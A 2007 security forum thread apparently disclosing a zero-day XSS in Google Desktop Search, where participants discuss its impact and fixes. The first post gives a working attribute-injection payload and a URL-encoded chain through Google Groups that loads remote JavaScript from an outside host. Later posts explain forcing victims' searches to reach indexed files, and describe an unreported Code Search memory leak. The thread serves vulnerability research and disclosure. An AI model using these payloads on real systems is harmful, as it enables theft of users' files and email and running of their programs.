Google Desktop Search XSS Vulnerability
Posted by: Hong
Date: January 30, 2007 04:42AM

Affected: Google Desktop 4.5 - 5.0.701.18382

Description:
Google Desktop Search does not sanitize " in the To: field.

PoC:
Search the following query by Google Desktop Search:
to:"x"x style=height:500;width:500 onmouseover=alert('xss') "b
Then go to the advanced search and move your mouse over the "TO:" textfield.

This PoC only shows the concept; it requires user interaction, but if you find any XSS hole on google.com, you can search for it with Google web search, then use the google.com XSS hole to get the desktop link and append &flags=128 to the end of the URI. After fully exploiting it, an attacker can read any file, email and anything indexed by Google Desktop Search, or use other Google Desktop functions, e.g. the redir function to execute any indexed executable file.

Another PoC; it uses a Google Groups XSS vuln to exploit it. (IE only)
http://groups.google.com/groups?q=to%3A%22x%22x+style%3Dxa%3Aexpression%28s%3Ddocument.createElement%28%27script%27%29%29%3Bxb%3Aexpression%28s.src%3D%27http%3A%2F%2Fyathong.googlepages.com%2FGDSxss2.js%27%29%3Bxc%3Aexpression%28document.appendChild%28s%29%29+%22&ie=%20style%3Dxa%3Aexpression%28s%3Ddocument.createElement%28%27script%27%29%29%3Bxb%3Aexpression%28s.src%3D%27http%3A%2F%2Fyathong.googlepages.com%2FGDSxss1.js%27%29%3Bxc%3Aexpression%28document.appendChild%28s%29%29%20&hl=zh_TW%cd&oe=gb2312


It is a zero-day exploit. I did not inform Google. Originally, I planned on writing an advisory in Chinese and informing the Google China security team. Unfortunately, it seems that Google China does not have any security team or security engineer, and will not hire any; really disappointed.

P.S. Sorry for my poor English; if you have any questions, feel free to ask.

Edit: Add the PoC Link.

- Hong



Edited 1 time(s). Last edit at 02/01/2007 04:57AM by Hong.

Re: Google Desktop Search XSS Vulnerability
Posted by: jungsonn
Date: January 30, 2007 05:38AM

Well if they would, they certainly must hire you, Hong! :) Great find, and dangerous too.

Re: Google Desktop Search XSS Vulnerability
Posted by: trev
Date: January 30, 2007 08:42AM

Sorry, I didn't quite get how it can be exploited. I didn't see Google's Desktop Search in action, is it somehow possible to inject search queries into it from the web?

Re: Google Desktop Search XSS Vulnerability
Posted by: Hong
Date: January 30, 2007 01:10PM

@jungsonn
If I could become a security engineer, I would be very happy, but it is quite impossible; I have no work experience in the security field, and my city, even the whole of China, does not pay close attention to security problems. There are very few security jobs.

@trev
Yes, search queries can be injected into it from the web.
After the user installs Google Desktop Search, a new hyperlink called Desktop appears on google.com above the query textfield. When the user searches via google.com, the Desktop hyperlink links to the URI of the user's Google Desktop server, including the query string and the private key, but it only shows the basic search interface; after adding &flags=128 to that URI, it shows the advanced search interface.

- Hong

Re: Google Desktop Search XSS Vulnerability
Posted by: rsnake
Date: February 03, 2007 07:17PM

I un-installed Google Desktop a few years ago and installed Yahoo Desktop, which not only indexes a lot more types of data and has automated readers built in, but also doesn't have a network shim, making it quite a bit more secure.

Hong, great job, but could you provide some screenshots / HTML snippets? I'd like to talk about this, but I'm not sure I understand how the desktop is involved in that search query.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Google Desktop Search XSS Vulnerability
Posted by: Kyran
Date: February 03, 2007 07:56PM

How is Yahoo Desktop working out for your indexing needs? Lately I use Windows Desktop Search. It has lots of 'IFilters' to read inside of several formats like PDF and indexes many 'text' formats and the contents.

- Kyran

Re: Google Desktop Search XSS Vulnerability
Posted by: rsnake
Date: February 04, 2007 09:00PM

I haven't played with Windows Desktop Search. Maybe I'll install it on a test machine and try it. I used Yahoo Desktop Search religiously for two years - I didn't notice much speed degradation at all and it indexes hundreds of file types.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Google Desktop Search XSS Vulnerability
Posted by: Kyran
Date: February 05, 2007 12:30AM

I'll install Yahoo Desktop Search on a test box soon too. Currently my WDS has 4000ish items indexed, all from specified folders (I want to keep my results clean. No need to have a random ini file turn up when I search for 'config') and it brings my results nearly instantly on this old box.

- Kyran

Re: Google Desktop Search XSS Vulnerability
Posted by: Hong
Date: February 05, 2007 04:02AM

@RSnake
Google Desktop Search provides a "to:" operator to search the "to" field of email.
If the search query is:
to:"x"x XSS HERE "
The resulting HTML of the "to:" textfield will become:
<input type=text size=24 name=to value="x"x XSS HERE ">
Here is the screenshot of the result (sorry that it is a Chinese version):
http://yathong.googlepages.com/GDS1.jpg

And here is another example.
to:"x"x style=height:500;width:500 onmouseover=alert('xss') "
The resulting HTML of the "to:" textfield will become:
<input type=text size=24 name=to value="x"x style=height:500;width:500 onmouseover=alert(&#39;xss&#39;) ">
http://yathong.googlepages.com/GDS2.jpg

Google Desktop Search does not go to the advanced search by default unless &flags=128 is appended to the URI.
Google Desktop Search has released a new version now; I don't know whether it fixes it or not.

- Hong

Re: Google Desktop Search XSS Vulnerability
Posted by: jungsonn
Date: February 05, 2007 08:01AM

Cool that it is also echoed back into the document title; from there one could easily add a new layer on top of the body, faking or phishing users.

Re: Google Desktop Search XSS Vulnerability
Posted by: rsnake
Date: February 05, 2007 01:44PM

And can you force users to search for that string or is this something they'd have to type in by hand? For some reason I thought they used a nonce to avoid allowing users to automatically post to their interface.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Google Desktop Search XSS Vulnerability
Posted by: Hong
Date: February 12, 2007 02:37AM

It can force users to search for that string. When the user searches from google.com, it creates a link to Google Desktop with that search query and nonce, and an attacker can get that link through a google.com XSS hole, then redirect to it.
http://yathong.googlepages.com/GDS3.jpg

- Hong



Edited 1 time(s). Last edit at 02/12/2007 05:01AM by Hong.

Re: Google Desktop Search XSS Vulnerability
Posted by: trev
Date: February 21, 2007 10:21AM

http://www.watchfire.com/resources/Overtaking-Google-Desktop.pdf is about a very similar XSS vulnerability in Google Desktop that has been fixed now. Explanation of the risks goes along the same lines as this thread - but this thread isn't referenced. Is it related? And most interestingly - is this XSS vulnerability also fixed?

Re: Google Desktop Search XSS Vulnerability
Posted by: rsnake
Date: February 21, 2007 12:12PM

I was wondering the same thing but it doesn't look like it. Btw, anyone have any idea what is going on here:

http://www.google.com/codesearch?hl=en&lr=&q=%22++-%27%27+show%3At-8icmuByTQ%3A37ubc1p6nyQ%3ANGJa6sl73i8&btnG=Search

Sorry, yah, these URLs are weird... just enter some random crap in the q variable but start it with a quote. It's just bizarre the results you get back.



Edited 1 time(s). Last edit at 02/21/2007 06:35PM by rsnake.

Re: Google Desktop Search XSS Vulnerability
Posted by: blad3
Date: February 21, 2007 04:57PM

Damn, this forum is killing the URLs.
RSnake, you need to save them :)

Re: Google Desktop Search XSS Vulnerability
Posted by: rsnake
Date: February 21, 2007 06:36PM

I may be able to save them from their ignorance, but no one can save them from their arrogance.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Google Desktop Search XSS Vulnerability
Posted by: trev
Date: February 22, 2007 05:51AM

Rsnake, I see random text in the error messages (changes even for the same query), I think the server is reading past the string end looking for the closing quotation mark - that's simply some trash from the server's memory. Nice one! Did you report it?

Edit: Tested it and it seems Google does in fact use null-terminated strings. I thought they used Python?

Edit2: It finally turned up something interesting - an IP address (196.207.x.x). It even answers to pings. Code search doesn't find it so it must be the address of some user. (On a closer look: the IP addresses I get there are more likely to be storage servers).

Edit3: And now even more interesting - value of the PREF cookie. Only 40 minutes old according to its timestamp.



Edited 4 time(s). Last edit at 02/22/2007 06:59AM by trev.

Re: Google Desktop Search XSS Vulnerability
Posted by: Hong
Date: February 22, 2007 02:05PM

@trev
They are not related; the XSS hole Watchfire disclosed uses the under: operator, and that is a persistent XSS. Google Desktop 4.5 - 5.0.701.18382 is not affected by it.
I don't know whether this XSS vulnerability is fixed or not; I haven't updated it. I will update it later and report back.

- Hong

Re: Google Desktop Search XSS Vulnerability
Posted by: rsnake
Date: February 22, 2007 11:18PM

Hong, Trev was talking about that weird codesearch bug that I wrote about.

Trev, no I didn't report it. They can figure it out for themselves, they read this site anyway.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Google Desktop Search XSS Vulnerability
Posted by: Hong
Date: March 01, 2007 05:25AM

RSnake, I replied to trev's previous post; sorry that I didn't quote his message.

trev Wrote:
-------------------------------------------------------
> http://www.watchfire.com/resources/Overtaking-Google-Desktop.pdf
> is about a very similar XSS vulnerability in Google Desktop that has been
> fixed now. Explanation of the risks goes along the same lines as this
> thread - but this thread isn't referenced. Is it related? And most
> interestingly - is this XSS vulnerability also fixed?

Google Desktop 4.5 5.0.0702.07034 fixed the vulnerability, but I found another XSS vuln.
http://yathong.googlepages.com/gds4.jpg
I still don't know where the problem is that causes this XSS vuln; I will research it and post the result.

- Hong

Re: Google Desktop Search XSS Vulnerability
Posted by: rsnake
Date: March 01, 2007 10:38PM

Yes, please do. That's definitely worth a post.

- RSnake
Gotta love it. http://ha.ckers.org
